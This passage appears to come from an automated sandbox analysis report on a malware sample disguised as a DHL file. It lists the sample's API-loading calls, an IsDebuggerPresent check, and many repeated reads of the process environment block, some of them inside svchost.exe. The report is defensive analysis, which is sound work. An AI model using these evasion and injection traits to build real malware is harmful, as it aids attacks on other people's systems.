            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C35A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00C35A7C
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C04B37 LoadLibraryA,GetProcAddress,0_2_00C04B37
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_013ED330 mov eax, dword ptr fs:[00000030h]0_2_013ED330
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_013ED2D0 mov eax, dword ptr fs:[00000030h]0_2_013ED2D0
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_013EBCB0 mov eax, dword ptr fs:[00000030h]0_2_013EBCB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]2_2_03A663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]2_2_03AEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h]2_2_03AB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]2_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]2_2_03AD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]2_2_03AD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]2_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B08324 mov ecx, dword ptr fs:[00000030h]2_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]2_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]2_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]2_2_03A2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]2_2_03A50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]2_2_03AD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]2_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h]2_2_03AD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0634F mov eax, dword ptr fs:[00000030h]2_2_03B0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B062D6 mov eax, dword ptr fs:[00000030h]2_2_03B062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]2_2_03A2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]2_2_03A2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]2_2_03AB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]2_2_03AB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0625D mov eax, dword ptr fs:[00000030h]2_2_03B0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]2_2_03A2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]2_2_03A36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]2_2_03AEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]2_2_03AEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]2_2_03A70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]2_2_03B061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]2_2_03A601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]2_2_03A60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]2_2_03AF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h]2_2_03B04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h]2_2_03B04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]2_2_03A2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]2_2_03AC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A280A0 mov eax, dword ptr fs:[00000030h]2_2_03A280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]2_2_03AC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]2_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]2_2_03A3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03A2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]2_2_03A380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h]2_2_03AB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03A2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]2_2_03A720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]2_2_03AB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]2_2_03A2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]2_2_03A2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h]2_2_03AC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h]2_2_03AB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]2_2_03A5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]2_2_03A32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h]2_2_03AB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]2_2_03A307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE47A0 mov eax, dword ptr fs:[00000030h]2_2_03AE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD678E mov eax, dword ptr fs:[00000030h]2_2_03AD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]2_2_03ABE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]2_2_03AB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]2_2_03A6273C
